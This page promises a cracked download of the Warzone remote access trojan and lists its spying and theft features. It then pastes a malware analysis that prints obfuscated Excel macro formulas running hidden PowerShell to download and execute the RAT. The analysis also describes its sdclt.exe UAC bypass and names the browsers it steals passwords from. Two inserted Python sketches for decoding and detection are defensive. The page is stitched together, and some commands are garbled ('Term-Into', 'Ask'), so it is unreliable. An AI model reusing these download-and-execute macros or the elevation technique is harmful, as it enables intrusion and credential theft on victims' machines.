
Warzone Rat Cracked Download 2021

Warzone is a powerful RAT (Remote Access Trojan) used to control a computer, steal passwords or bank details, or spy on someone.

The Warzone developers rent out several products on their website:

  • RAT
  • Rat Poison
  • Crypter
  • SILENT.doc exploit
  • SILENT EXCEL Exploit

Features:

  • Native, independent stub
  • Remote Desktop
  • Hidden Remote Desktop – HRDP
  • Privilege Escalation – UAC Bypass
  • Remote WebCam
  • Password Recovery
  • File Manager
  • Download & Execute
  • Live Keylogger
  • Offline Keylogger
  • Remote Shell
  • Process Manager
  • Reverse Proxy
  • Automatic Tasks
  • Mass Execute
  • Smart Updater
  • HRDP WAN Direct Connection
  • Persistence
  • Windows Defender Bypass

    The malicious XLS

    The XLS used in the attack uses Excel 4.0 Macro, also known as XLM Macro. The XLM Macro feature has been part of Microsoft Excel for a long time, but we’ve seen a spike in its malicious usage for a few months now. Malware authors exploit this feature of Excel, which allows formulas to be written using macros.

    When we got hold of the XLS on November 11, only a few of the anti-malware vendors could detect it on VirusTotal (see Figure 3).

Figure 3: Detections on VirusTotal.

In the XLS file, the macros are implemented as formulas in a hidden sheet and are not visible if the XLS is opened. The macros are visible only after unhiding the sheet. The following screenshot shows the unhidden sheet with macro code embedded in the formula.

Figure 4: Macro on an open sheet.

Here is the macro code in the appropriate rows and columns:

Row 596 column E – = CHAR (99) and CHAR (109) and CHAR (100) and CHAR (32) and CHAR (47) and CHAR (99) and “powe ^ rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt ). (‘Down’ + ‘loadFile’). “” “” Ask “” “” (‘’,’gm.exe’) ”
Row 597 column E – = CHAR (99) & CHAR (109) & CHAR (100) & CHAR (32) and CHAR (47) and CHAR (99) and “powe ^ rshell -w 1 stARt`-slE`Ep 20; Term-Into “” gm.exe “” -Destination “” $ {enV`: appdata} “” ”
Row 598 column E – = CHAR (99) & CHAR (109) & CHAR (100) & CHAR (32) and CHAR (47) and CHAR (99) & “powe ^ rshell -w 1 stARt`-slE`Ep 25; cd $ {enV `: appdata}; ./gm.exe”

These macros are responsible for downloading and executing Warzone RAT. The Warzone payload takes complete control of the system after bypassing UAC, stealing information and monitoring the victim’s machine.
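
A defender's triage sketch for formulas like the ones above, added here as an example and not taken from the original analysis: it resolves the CHAR() concatenation, strips the caret and backtick obfuscation, and reports which download-and-run indicators appear. The indicator list and the sample formula are constructed; the download URL is left empty as on the page.

```python
import re

# Indicators (assumed list) matched against the normalised, lower-cased command.
INDICATORS = {
    "cmd /c": "shell launch",
    "powershell": "PowerShell invoked",
    "-w 1": "hidden window",
    "net.webclient": "web client object",
    "downloadfile": "file download",
    "start-sleep": "delayed execution",
    "env:appdata": "AppData staging",
}

def eval_formula(formula: str) -> str:
    """Resolve CHAR(n) calls and "&"-joined string literals into one string."""
    body = formula.strip().lstrip("=")
    out = []
    # Tokens: CHAR(n) or a double-quoted literal ("" is an escaped quote).
    for m in re.finditer(r'CHAR\s*\(\s*(\d+)\s*\)|"((?:[^"]|"")*)"', body, re.I):
        if m.group(1) is not None:
            out.append(chr(int(m.group(1))))
        else:
            out.append(m.group(2).replace('""', '"'))
    return "".join(out)

def normalise(cmd: str) -> str:
    """Undo cmd caret escapes, PowerShell backticks and 'a'+'b' string splits."""
    cmd = cmd.replace("^", "").replace("`", "")
    cmd = re.sub(r"'\s*\+\s*'", "", cmd)   # 'Down'+'loadFile' -> 'DownloadFile'
    return re.sub(r"\s+", " ", cmd).lower()

def triage(formula: str) -> dict:
    """Return the cleartext command and the indicator labels found in it."""
    clear = normalise(eval_formula(formula))
    hits = [label for needle, label in INDICATORS.items() if needle in clear]
    return {"command": clear, "hits": hits}

# Constructed sample modelled on row 596 above; URL elided as on the page.
SAMPLE = ('=CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&'
          '" powe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).'
          "('Down'+'loadFile')('','gm.exe')\"")

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run over every formula cell of a hidden macro sheet, this turns the obfuscated rows into readable command lines that can be matched by ordinary command-line detections.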

Here’s how the attack goes:

  • The macro in the XLS file uses PowerShell to download and run gm.exe, which is Warzone RAT.
  • gm.exe bypasses UAC to operate at the highest level of integrity.
  • gm.exe copies itself to %programdata% under the name Images.exe and runs it. Images.exe runs at a high level of integrity.

The image below shows the flow of the attack.

Warzone RAT payload: UAC bypass

Warzone RAT (gm.exe) is a 32-bit application and uses sdclt.exe to bypass UAC and operate with higher rights. sdclt.exe is a built-in Windows utility used for backup and restore purposes. sdclt is designed to auto-elevate its own privileges and uses the Control Panel binary, control.exe, to back up and restore Control Panel settings.


Many UAC bypass techniques do not work on Windows 10 because of default file system restrictions. A 32-bit application cannot access the native directory c:\windows\system32 because the operating system redirects its requests to c:\windows\SysWOW64. sdclt.exe and the other binaries used for UAC bypass are 64-bit applications and are not available in the SysWOW64 directory.

However, the operating system provides a way to disable file system redirection through the Wow64DisableWow64FsRedirection API. Warzone therefore uses this API to disable file system redirection and reach sdclt.exe, which resides in the system32 directory (see Figure 6, below).
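
The elevation chain described above can be hunted in process-creation telemetry. The following detection sketch is an added example, not code from the original analysis; the event fields are simplified from Sysmon process-creation events, and the sample events, including the exact parent/child order, are constructed assumptions.

```python
from ntpath import basename   # parses Windows paths on any platform

USER_WRITABLE = ("\\appdata\\", "\\programdata\\")

def in_user_writable(image: str) -> bool:
    return any(part in image.lower() for part in USER_WRITABLE)

def ancestors(pid, by_pid):
    """Yield ancestor events of pid, nearest first (stops on gaps or cycles)."""
    seen, ev = set(), by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        yield ev

def detect(events):
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"]).lower()
        parent = by_pid.get(e["ppid"])
        # Rule 1: sdclt.exe started by a binary living in a user-writable path.
        if name == "sdclt.exe" and parent and in_user_writable(parent["image"]):
            alerts.append(("sdclt_from_user_path", e["pid"]))
        # Rule 2: high-integrity binary in a user-writable path below sdclt.exe.
        if e["integrity"] == "High" and in_user_writable(e["image"]):
            chain = [basename(a["image"]).lower() for a in ancestors(e["pid"], by_pid)]
            if "sdclt.exe" in chain:
                alerts.append(("elevated_child_of_sdclt", e["pid"]))
    return alerts

# Constructed events: pids 20-50 model the chain above, 60-70 a benign sdclt run.
EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe", "integrity": "Medium"},
    {"pid": 20, "ppid": 10, "image": r"C:\Users\u\AppData\Roaming\gm.exe", "integrity": "Medium"},
    {"pid": 30, "ppid": 20, "image": r"C:\Windows\System32\sdclt.exe", "integrity": "High"},
    {"pid": 40, "ppid": 30, "image": r"C:\Users\u\AppData\Roaming\gm.exe", "integrity": "High"},
    {"pid": 50, "ppid": 40, "image": r"C:\ProgramData\Images.exe", "integrity": "High"},
    {"pid": 60, "ppid": 10, "image": r"C:\Windows\System32\sdclt.exe", "integrity": "High"},
    {"pid": 70, "ppid": 60, "image": r"C:\Windows\System32\control.exe", "integrity": "High"},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```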

Figure 8: Images.exe run at a high level of integrity.

Warzone RAT can steal passwords from the following browsers:

  • Google Chrome
  • Epic Privacy Browser
  • Microsoft Edge
  • Opera
  • Tencent QQ Browser
  • Brave Browser
  • CenterBrowser
  • Blur
  • Torch Browser
  • Slimjet Browser

These browsers hold stored passwords in a database. The following screenshot (Figure 9) shows a query used to extract data from a browser.
